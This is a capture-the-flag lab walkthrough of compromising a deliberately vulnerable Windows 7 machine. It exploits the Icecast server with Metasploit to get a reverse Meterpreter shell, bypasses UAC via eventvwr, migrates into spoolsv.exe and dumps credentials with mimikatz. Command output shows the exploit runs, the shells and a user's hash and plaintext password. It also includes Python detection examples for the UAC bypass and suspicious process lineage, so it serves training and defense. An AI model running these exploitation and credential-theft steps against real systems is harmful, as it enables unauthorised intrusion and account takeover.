Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
Recon - Nmap Scans
nmap -sS -p- 10.10.136.87 -vvv
nmap -sC -sV -O -T4 10.10.136.87 -p3389,135,139,445,5357,8000 -vvv
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 125 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server? syn-ack ttl 125
| ssl-cert: Subject: commonName=Dark-PC
| Issuer: commonName=Dark-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-07-07T22:27:33
| Not valid after: 2023-01-06T22:27:33
| MD5: 60a9 165d c701 4865 68b7 ce72 c281 6ba1
| SHA-1: 6678 a740 12ae 696e ac32 d902 dfb5 3c02 9083 ee67
|_ssl-date: 2022-07-08T22:41:37+00:00; -1s from scanner time.
5357/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http syn-ack ttl 125 Icecast streaming media server
| http-methods:
|_ Supported Methods: GET
|_http-title: Site doesn't have a title (text/html).
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 7 Ultimate SP1 or Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.011 days (since Fri Jul 8 15:25:11 2022)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h14m59s, deviation: 2h30m00s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 59430/tcp): CLEAN (Couldn't connect)
| Check 2 (port 19722/tcp): CLEAN (Couldn't connect)
| Check 3 (port 35734/udp): CLEAN (Timeout)
| Check 4 (port 14831/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:18:f7:78:2e:61 (unknown)
| Names:
| DARK-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| DARK-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 02 18 f7 78 2e 61 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb2-time:
| date: 2022-07-08T22:41:32
|_ start_date: 2022-07-08T22:27:32
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-07-08T17:41:32-05:00
Questions
Which port is MSRDP?
- 3389
What service did nmap identify as running on port 8000? (First word of this service)
- Icecast
What does Nmap identify as the hostname of the machine? (All caps for the answer)
- DARK-PC
Gain Access
Now that we’ve identified some interesting services running on our target machine, let’s do a little bit of research into one of the weirder services identified: Icecast. Icecast, or at least the version running on our target, is heavily flawed and has a high-severity vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.
- Execute Code Overflow
What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000
- CVE-2004-1561
After Metasploit has started, let’s search for our target exploit using the command ‘search icecast’. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in ‘RP: Metasploit’, which is recommended to be completed prior to this room, although not entirely necessary.
- exploit/windows/http/icecast_header
First let’s check that the LHOST option is set to our tun0 IP (which can be found on the access page). With that done, let’s set that last option to our target IP. Now that we have everything ready to go, let’s run our exploit using the command exploit.
msf6 exploit(windows/http/icecast_header) > exploit
[*] Started reverse TCP handler on 10.2.127.225:4444
[*] Sending stage (175686 bytes) to 10.10.223.231
[*] Meterpreter session 1 opened (10.2.127.225:4444 -> 10.10.223.231:49169) at 2022-07-08 17:49:09 -0700
meterpreter >
Escalate
Woohoo! We’ve gained a foothold into our victim machine! What’s the name of the shell we have now? What user was running that Icecast process? The commands used in this question and the next few are taken directly from the ‘RP: Metasploit’ room.
What build of Windows is the system?
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
Now that we know some of the finer details of the system we are working with, let’s start escalating our privileges. First, what is the architecture of the process we’re running?
- x64
Now that we know the architecture of the process, let’s perform some further recon. While this doesn’t work the best on x64 machines, run the following command: run post/multi/recon/local_exploit_suggester. This can appear to hang as it tests exploits and might take several minutes to complete.
Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?
- exploit/windows/local/bypassuac_eventvwr
Now that we have an exploit in mind for elevating our privileges, let’s background our current session using the command background or CTRL + Z. Take note of what session number we have; this will likely be 1 in this case. We can list all of our active sessions using the command sessions when outside of the meterpreter shell. Go ahead and select our previously found local exploit for use using the command use FULL_PATH_FOR_EXPLOIT.
Local exploits require a session to be selected (something we can verify with the command show options), so set this now using the command set session SESSION_NUMBER.
Now that we’ve set our session number, further options will be revealed in the options menu. We’ll have to set one more, as our listener IP isn’t correct. What is the name of this option?
Set this option now. You might have to check your IP on the TryHackMe network using the command ip addr.
After we’ve set this last option, we can now run our privilege escalation exploit. Run this now using the command run. Note, this might take a few attempts, and you may need to relaunch the box and exploit the service again if this fails.
msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 10.2.127.225:5555
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175686 bytes) to 10.10.223.231
[*] Meterpreter session 2 opened (10.2.127.225:5555 -> 10.10.223.231:49213) at 2022-07-08 18:09:51 -0700
[*] Cleaning up registry keys ...
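The module output above gives defenders two things to look for: it writes a per-user .msc file handler, launches the auto-elevating eventvwr.exe, and then removes the key again. The detection below is an added example, not the room’s or Metasploit’s code; the registry path it matches comes from public documentation of the Event Viewer bypass technique (not from this page), and the events are constructed in a simplified Sysmon-like text form rather than real Sysmon XML.

```python
from datetime import datetime, timedelta

# Per-user .msc handler the technique hijacks (public technique knowledge, not from the room).
MSC_HANDLER = r"\software\classes\mscfile\shell\open\command"
WINDOW = timedelta(seconds=30)  # handler write -> elevated child launch

# Constructed sample, simplified Sysmon-style: time|event_id|key=value|...
# Event IDs follow Sysmon: 13 = registry value set, 12 = key delete, 1 = process create.
EVENTS = [
    r"2022-07-08T18:09:40|13|Image=C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe"
    r"|TargetObject=HKU\S-1-5-21-PLACEHOLDER\Software\Classes\mscfile\shell\open\command\(Default)"
    r"|Details=<stager command>",
    r"2022-07-08T18:09:41|1|Image=C:\Windows\SysWOW64\eventvwr.exe"
    r"|ParentImage=C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe|IntegrityLevel=High",
    r"2022-07-08T18:09:42|1|Image=C:\Windows\SysWOW64\cmd.exe"
    r"|ParentImage=C:\Windows\SysWOW64\eventvwr.exe|IntegrityLevel=High",
    r"2022-07-08T18:09:52|12|Image=C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe"
    r"|TargetObject=HKU\S-1-5-21-PLACEHOLDER\Software\Classes\mscfile\shell\open\command",
    # Benign: an administrator opening Event Viewer, which normally launches mmc.exe.
    r"2022-07-08T19:30:00|1|Image=C:\Windows\System32\mmc.exe"
    r"|ParentImage=C:\Windows\System32\eventvwr.exe|IntegrityLevel=High",
]


def parse(line):
    """Split one constructed event line into a dict with parsed time and event id."""
    ts, eid, *fields = line.split("|")
    ev = dict(f.split("=", 1) for f in fields)
    ev["time"], ev["eid"] = datetime.fromisoformat(ts), int(eid)
    return ev


def base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(lines):
    """Return (time, rule, image) alerts for the two signals of this bypass."""
    events = sorted((parse(l) for l in lines), key=lambda e: e["time"])
    alerts, handler_writes = [], []
    for e in events:
        tgt = e.get("TargetObject", "").lower()
        # Signal 1: the .msc handler being set in a user hive (HKU), where it never belongs.
        if e["eid"] == 13 and tgt.startswith("hku\\") and MSC_HANDLER in tgt:
            handler_writes.append(e)
            alerts.append((e["time"], "mscfile-handler-hijack", base(e["Image"])))
        # Signal 2: eventvwr.exe spawning anything other than mmc.exe.
        if e["eid"] == 1 and base(e.get("ParentImage", "")) == "eventvwr.exe" \
                and base(e["Image"]) != "mmc.exe":
            recent = any(e["time"] - w["time"] <= WINDOW for w in handler_writes)
            rule = "uac-bypass-eventvwr" if recent else "eventvwr-unexpected-child"
            alerts.append((e["time"], rule, base(e["Image"])))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(*alert)
```

The key deletion (event 12) is not alerted on by itself, but a handler that exists for only a few seconds is a strong hint the write was never meant to be found.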
Following completion of the privilege escalation a new session will be opened. Interact with it now using the command sessions SESSION_NUMBER. We can now verify that we have expanded permissions using the command getprivs. What permission listed allows us to take ownership of files?
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
Loot
Prior to further action, we need to move to a process that actually has the permissions we need to interact with the lsass service, the service responsible for authentication within Windows. First, let’s list the processes using the command ps. Note, we can see processes being run by NT AUTHORITY\SYSTEM as we have escalated permissions (even though our process doesn’t).
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
100 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
508 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
820 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
888 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
936 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1064 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1196 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1304 100 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1324 1296 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1376 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1404 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1444 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1548 820 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
1568 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1588 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
1648 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1684 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1736 2276 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
1848 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
2056 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2276 1324 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2452 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
2512 692 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
2596 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2604 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
2764 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
2856 820 rundll32.exe x64 1 Dark-PC\Dark C:\Windows\System32\rundll32.exe
2876 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
2892 1292 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
2900 2856 dinotify.exe x64 1 Dark-PC\Dark C:\Windows\System32\dinotify.exe
2960 2512 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
In order to interact with lsass we need to be ‘living in’ a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this, and it’ll restart if we crash it! What’s the name of the printer service?
- spoolsv.exe
Mentioned within this question is the term ‘living in’ a process. Often when we take over a running program we ultimately load another shared library (a DLL) into the program which includes our malicious code. From this, we can spawn a new thread that hosts our shell. Migrate to this process now with the command migrate -N PROCESS_NAME.
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2892 to 1376...
[*] Migration completed successfully.
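From the defender’s side, the ps listing above already tells the story before any migration happens: the Icecast2.exe media server has a cmd.exe child, and a 32-bit powershell.exe runs with a parent that no longer exists. The review below is an added example (not part of the original write-up) that parses a constructed excerpt of that listing and flags both lineages; the shell and exposed-service name sets are assumptions for this host.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid name arch session user path")

# Constructed excerpt of the `ps` listing above (same columns, fewer rows).
PS_OUTPUT = r"""
PID   PPID  Name            Arch  Session  User                 Path
---   ----  ----            ----  -------  ----                 ----
4     0     System          x64   0
692   592   services.exe    x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe
700   592   lsass.exe       x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
1324  1296  explorer.exe    x64   1        Dark-PC\Dark         C:\Windows\explorer.exe
1376  692   spoolsv.exe     x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\spoolsv.exe
1736  2276  cmd.exe         x86   1        Dark-PC\Dark         C:\Windows\SysWOW64\cmd.exe
2276  1324  Icecast2.exe    x86   1        Dark-PC\Dark         C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2892  1292  powershell.exe  x86   1        Dark-PC\Dark         C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
"""

# Columns are space-aligned and User/Path may contain spaces, so match rows by shape.
ROW = re.compile(
    r"^(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+)"
    r"(?:\s+(?P<arch>x64|x86)\s+(?P<session>\d+))?"
    r"(?:\s+(?P<user>\S.*?)\s+(?P<path>[A-Za-z]:\\\S.*))?\s*$"
)

SHELLS = {"cmd.exe", "powershell.exe"}     # assumption: interactive shells of interest
EXPOSED_SERVICES = {"Icecast2.exe"}        # assumption for this host: the listener on 8000


def parse_ps(text):
    """Map PID -> Proc; header, separator and blank lines are skipped."""
    procs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            d = m.groupdict()
            procs[int(d["pid"])] = Proc(int(d["pid"]), int(d["ppid"]), d["name"],
                                        d["arch"], d["session"], d["user"], d["path"])
    return procs


def lineage(procs, pid):
    """Walk parent links upward until the chain leaves the listing."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid].name)
        pid = procs[pid].ppid
    return chain


def review(procs):
    """Flag shells spawned by an exposed service and shells whose parent is gone."""
    findings = []
    for p in procs.values():
        if p.name not in SHELLS:
            continue
        parent = procs.get(p.ppid)
        if parent is not None and parent.name in EXPOSED_SERVICES:
            findings.append((p.pid, "service-spawned-shell"))
        # explorer.exe is normally orphaned too (userinit.exe exits), so only shells count here.
        if parent is None and p.ppid != 0:
            findings.append((p.pid, "orphaned-shell"))
    return findings
```

Once the session migrates into spoolsv.exe the process list looks clean again, which is why the lineage evidence should be captured from process-creation telemetry rather than a later snapshot.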
Let’s check what user we are now with the command getuid. What user is listed?
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Now that we’ve made our way to full administrator permissions we’ll set our sights on looting. Mimikatz is a rather infamous password dumping tool that is incredibly useful. Load it now using the command load kiwi (Kiwi is the updated version of Mimikatz).
meterpreter > load kiwi
Loading extension kiwi...
.## ## #. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ## . "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ## ' Vincent LE TOUX ( vincent.letoux@gmail.com )
'## ## #' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
Loading kiwi into our meterpreter session will expand our help menu; take a look at the newly added section of the help menu now via the command help.
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
Which command allows us to retrieve all credentials?
- creds_all
Run this command now. What is Dark’s password? Mimikatz allows us to steal this password out of memory even without the user ‘Dark’ logged in, as there is a scheduled task that runs Icecast as the user ‘Dark’. It also helps that Windows Defender isn’t running on the box ;) (Take a look again at the ps list; this box isn’t in the best shape, with both the firewall and Defender disabled.)
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
Post-Exploitation
Before we start our post-exploitation, let’s revisit the help menu one last time in the meterpreter shell. We’ll answer the following questions using that menu.
What command allows us to dump all of the password hashes stored on the system? We won’t crack the Administrative password in this case as it’s pretty strong (this is intentional to avoid password spraying attempts).
- hashdump
While more useful when interacting with a machine being used, what command allows us to watch the remote user’s desktop in real time?
- screenshare
How about if we wanted to record from a microphone attached to the system?
- record_mic
To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don’t ever do this on a pentest unless you’re explicitly allowed to do so! This is not beneficial to the defending team as they try to break down the events of the pentest after the fact.
- timestomp
Mimikatz allows us to create what’s called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?
- golden_ticket_create
Golden ticket attacks are a function within Mimikatz which abuses a component of Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.
One last thing to note. As we have the password for the user ‘Dark’ we can now authenticate to the machine and access it via remote desktop (MSRDP). As this is a workstation, we’d likely kick off whatever user is signed onto it if we connect to it; however, it’s always interesting to remote into machines and view them as their users do. If this hasn’t already been enabled, we can enable it via the following Metasploit module: run post/windows/manage/enable_rdp